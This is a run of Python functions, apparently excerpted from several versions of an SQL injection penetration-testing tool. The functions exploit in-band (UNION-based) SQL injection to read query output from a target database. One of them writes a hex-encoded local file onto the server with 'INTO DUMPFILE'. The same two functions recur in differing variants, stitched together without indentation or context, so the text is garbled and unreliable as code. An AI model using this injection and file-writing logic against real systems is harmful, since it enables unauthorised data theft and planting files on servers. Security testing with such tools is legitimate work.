def unionWriteFile(self, wFile, dFile, fileType, confirm=True):
logger.debug("encoding file to its hexadecimal string value")
fcEncodedList = self.fileEncode(wFile, "hex", True)
fcEncodedStr = fcEncodedList[0]
fcEncodedStrLen = len(fcEncodedStr)
if kb.injPlace == "GET" and fcEncodedStrLen > 8000:
warnMsg = "the injection is on a GET parameter and the file "
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
warnMsg += "bytes, this might cause errors in the file "
warnMsg += "writing process"
logger.warn(warnMsg)
unionTest()
oldParamFalseCond = conf.paramFalseCond
conf.paramFalseCond = True
debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
logger.debug(debugMsg)
sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile)
unionUse(sqlQuery, direct=True, unescape=False, nullChar="''")
conf.paramFalseCond = oldParamFalseCond
if confirm:
self.askCheckWrittenFile(wFile, dFile, fileType)
def __goInband(expression,
expected=None,
sort=True,
resumeValue=True,
unpack=True,
dump=False):
"""
Retrieve the output of a SQL query taking advantage of an inband SQL
injection vulnerability on the affected parameter.
"""
output = None
partial = False
data = []
if resumeValue:
output = resume(expression, None)
if not output or (output and
(expected == EXPECTED.INT and not output.isdigit())):
partial = True
if output is None:
output = unionUse(expression, unpack=unpack, dump=dump)
if output:
data = parseUnionPage(output, expression, partial, None, sort)
return data
def __goInband(expression, expected=None):
"""
Retrieve the output of a SQL query taking advantage of an inband SQL
injection vulnerability on the affected parameter.
"""
output = None
partial = False
data = []
condition = (
kb.resumedQueries and conf.url in kb.resumedQueries.keys()
and expression in kb.resumedQueries[conf.url].keys()
)
if condition:
output = resume(expression, None)
if not output or ( expected == "int" and not output.isdigit() ):
partial = True
if not output:
output = unionUse(expression, resetCounter=True)
if output:
data = parseUnionPage(output, expression, partial, condition)
return data
def __goInband(expression, expected=None):
"""
Retrieve the output of a SQL query taking advantage of an inband SQL
injection vulnerability on the affected parameter.
"""
output = None
partial = False
data = []
condition = (kb.resumedQueries and conf.url in kb.resumedQueries.keys()
and expression in kb.resumedQueries[conf.url].keys())
if condition:
output = resume(expression, None)
if not output or (expected == "int" and not output.isdigit()):
partial = True
if not output:
output = unionUse(expression, resetCounter=True)
if output:
data = parseUnionPage(output, expression, partial, condition)
return data
def unionWriteFile(self, wFile, dFile, fileType, confirm=True):
logger.debug("encoding file to its hexadecimal string value")
fcEncodedList = self.fileEncode(wFile, "hex", True)
fcEncodedStr = fcEncodedList[0]
fcEncodedStrLen = len(fcEncodedStr)
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
warnMsg = "the injection is on a GET parameter and the file "
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
warnMsg += "bytes, this might cause errors in the file "
warnMsg += "writing process"
logger.warn(warnMsg)
debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
logger.debug(debugMsg)
sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile)
unionUse(sqlQuery, unpack=False)
if confirm:
self.askCheckWrittenFile(wFile, dFile, fileType)
def __goInband(expression, expected=None, sort=True, resumeValue=True, unpack=True, dump=False):
"""
Retrieve the output of a SQL query taking advantage of an inband SQL
injection vulnerability on the affected parameter.
"""
output = None
partial = False
data = []
if resumeValue:
output = resume(expression, None)
if not output or (output and (expected == EXPECTED.INT and not output.isdigit())):
partial = True
if output is None:
output = unionUse(expression, unpack=unpack, dump=dump)
if output:
data = parseUnionPage(output, expression, partial, None, sort)
return data
